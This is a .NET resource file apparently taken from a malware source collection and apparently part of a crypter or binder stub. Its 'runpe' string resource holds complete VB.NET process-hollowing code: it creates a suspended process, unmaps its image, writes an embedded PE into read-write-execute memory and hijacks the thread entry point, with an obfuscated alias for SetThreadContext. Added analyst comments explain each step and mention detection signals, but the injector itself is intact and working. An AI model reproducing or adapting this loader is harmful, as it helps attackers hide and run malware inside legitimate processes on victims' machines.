MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d/TempRes.resx

<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goal of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name and a value. The row also contains a
type or mimetype. Type corresponds to a .NET class that supports
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
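The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist (deserialize) the object. Because
the reader deserializes these values when it loads the file, a .resx
from an untrusted source should be reviewed as text before it is opened
with a reader or designer. This is currently not extensible. For a given
mimetype the value must be set accordingly: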
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="crypted" xml:space="preserve">
<value>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
</data>
<data name="runpe" xml:space="preserve">
<value>Imports System
Imports System.Runtime.InteropServices
Imports System.Text
' ANALYST NOTES (annotation only; no code token below was changed)
' This text is a string resource, not a compiled source file. It contains
' template tokens (the two double-percent markers inside InjectPE), so it is
' presumably filled in and compiled by a component not shown on this page.
' What the code does: it starts a process suspended, unmaps that process's
' main image, writes a different PE image into it and redirects the primary
' thread to the new entry point. This call sequence is widely documented as
' process hollowing (MITRE technique T1055.012).
' Every offset used below matches a 32-bit PE image and the 32-bit thread
' CONTEXT layout; nothing in the text handles a 64-bit layout.
Namespace Inject
' Holds the native imports and the single public entry point InjectPE.
Public Class RunPE
' kernel32 CreateProcess. STARTUPINFO and PROCESS_INFORMATION are passed as
' raw arrays (sInfo, pInfo) instead of declared structures.
&lt;DllImport("kernel32")&gt; _
Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, &lt;MarshalAs(UnmanagedType.Bool)&gt; ByVal inherit As Boolean, ByVal creation As Integer, _
ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
End Function
' kernel32 GetThreadContext. The CONTEXT structure is marshalled as a flat
' UInteger array and addressed by slot index in InjectPE.
&lt;DllImport("kernel32")&gt; _
Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
End Function
' ntdll NtUnmapViewOfSection. Returns an NTSTATUS; InjectPE compares it to 0.
&lt;DllImport("ntdll")&gt; _
Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
End Function
' kernel32 ReadProcessMemory. The output buffer is a single ByRef IntPtr, so
' only one pointer-sized value can be read per call.
&lt;DllImport("kernel32")&gt; _
Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
End Function
' kernel32 ResumeThread.
&lt;DllImport("kernel32.dll")&gt; _
Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
End Function
' SetThreadContext imported under a meaningless local name through Alias.
' The real export name still appears as a literal in this line, so string
' or import matching on "SetThreadContext" is unaffected by the rename.
Declare Function usegfsuiefgseuf Lib "kernel32" Alias "SetThreadContext" (ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As &lt;MarshalAs(UnmanagedType.Bool)&gt; Boolean
' kernel32 VirtualAllocEx.
&lt;DllImport("kernel32")&gt; _
Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
End Function
' kernel32 VirtualProtectEx. Declared but not called anywhere in the visible
' InjectPE body.
&lt;DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)&gt; _
Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
End Function
' kernel32 WriteProcessMemory. lpNumberOfBytesWritten is declared ByVal
' Integer, so the caller's variable is never updated with a byte count.
&lt;DllImport("kernel32.dll", SetLastError:=True)&gt; _
Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
End Function
' Runs the whole sequence once. Returns False only when an exception is
' caught; every other path, including a failed CreateProcess or a failed
' inner step, falls through to Return True.
Public Shared Function InjectPE() As Boolean
Try
' Null value reused for every optional pointer argument of CreateProcess.
Dim procAttr As IntPtr = IntPtr.Zero
' Four slots filled by CreateProcess as PROCESS_INFORMATION: index 0 is used
' as the process handle and index 1 as the thread handle in the calls below.
Dim processInfo As IntPtr() = New IntPtr(3) {}
' 68 zero bytes passed where CreateProcess expects STARTUPINFO.
Dim startupInfo As Byte() = New Byte(67) {}
' Image to be written into the target, decoded from base64. The argument is
' a template token, so the data is supplied outside this text.
Dim bytes() As Byte = Convert.FromBase64String(%%40%%)
' Offset 60 (hex 3C) of a PE file holds e_lfanew, the file offset of the PE
' header. Nothing here validates the MZ or PE signatures.
Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
' PE header + 6: NumberOfSections.
Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
' PE header + hex 54: SizeOfHeaders in a PE32 optional header.
Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &amp;H54))
' Creation flag 4 is CREATE_SUSPENDED. The command line is a template token,
' so the host executable is chosen outside this text.
If CreateProcess(Nothing, New StringBuilder("%%42%%"), procAttr, procAttr, False, 4, _
procAttr, Nothing, startupInfo, processInfo) Then
' 179 UInteger slots = 716 bytes, the size of the 32-bit CONTEXT structure.
Dim ctxt As UInteger() = New UInteger(178) {}
' ContextFlags: hex 10002 is CONTEXT_INTEGER for x86.
ctxt(0) = &amp;H10002
If GetThreadContext(processInfo(1), ctxt) Then
' Slot hex 29 is byte offset 164, the Ebx field of the x86 CONTEXT. In
' write-ups of this technique, Ebx of a newly created suspended thread points
' at the PEB and PEB + 8 holds ImageBaseAddress.
Dim baseAddr As New IntPtr(ctxt(&amp;H29) + 8L)
Dim buffer__1 As IntPtr = IntPtr.Zero
Dim bufferSize As New IntPtr(4)
Dim numRead As IntPtr = IntPtr.Zero
' Read the 4-byte current image base from the target, then unmap the image
' at that address. NtUnmapViewOfSection returning 0 is STATUS_SUCCESS.
If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
' PE header + hex 34: preferred ImageBase. PE header + 80: SizeOfImage.
Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &amp;H34))
Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
' Allocation type hex 3000 is MEM_COMMIT combined with MEM_RESERVE;
' protection hex 40 is PAGE_EXECUTE_READWRITE. The returned address is used
' without a check. A private read-write-execute region created in a freshly
' started process is a common detection signal for this technique.
Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &amp;H3000, &amp;H40)
Dim lpNumberOfBytesWritten As Integer
' Copy the PE headers (SizeOfHeaders bytes) to the new base.
WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
Dim num5 As Integer = num - 1
' One pass per section header.
For i As Integer = 0 To num5
' 40-byte IMAGE_SECTION_HEADER read as ten Int32 values. Hex F8 is the
' distance from the PE signature to the first section header in PE32; the
' optional header size is hard-coded rather than read from the file header.
Dim dst As Integer() = New Integer(9) {}
Buffer.BlockCopy(bytes, (num2 + &amp;HF8) + (i * 40), dst, 0, 40)
' dst(3) is VirtualAddress, dst(4) SizeOfRawData, dst(5) PointerToRawData.
Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
' addr and size are reused here with swapped meaning: addr carries the byte
' count and size carries the destination address (new base + VirtualAddress).
addr = New IntPtr(buffer2.Length)
size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
Next
' Overwrite PEB + 8 in the target with the new image base (4 bytes).
size = New IntPtr(ctxt(&amp;H29) + 8L)
addr = New IntPtr(4)
WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
' Slot hex 2C is the Eax field of the x86 CONTEXT; it is set to the new base
' plus AddressOfEntryPoint (PE header + 40).
ctxt(&amp;H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
' SetThreadContext, called through the aliased import.
usegfsuiefgseuf(processInfo(1), ctxt)
End If
End If
' Reached whenever CreateProcess succeeded, whether or not the steps above
' completed.
ResumeThread(processInfo(1))
End If
Catch
' Any exception is swallowed and reported only as False.
Return False
End Try
Return True
End Function
End Class
End Namespace</value>
</data>
<!-- String resource "settings": a percent-delimited option string. The code that parses it is not on this page, so the meaning of each field is unknown here. -->
<data name="settings" xml:space="preserve">
<value>%STR%vBzvUEEk%0%0%0%0%Critical%%%0%0%</value>
</data>
<!-- String resource "bind": present but empty in this sample. -->
<data name="bind" xml:space="preserve">
<value />
</data>
</root>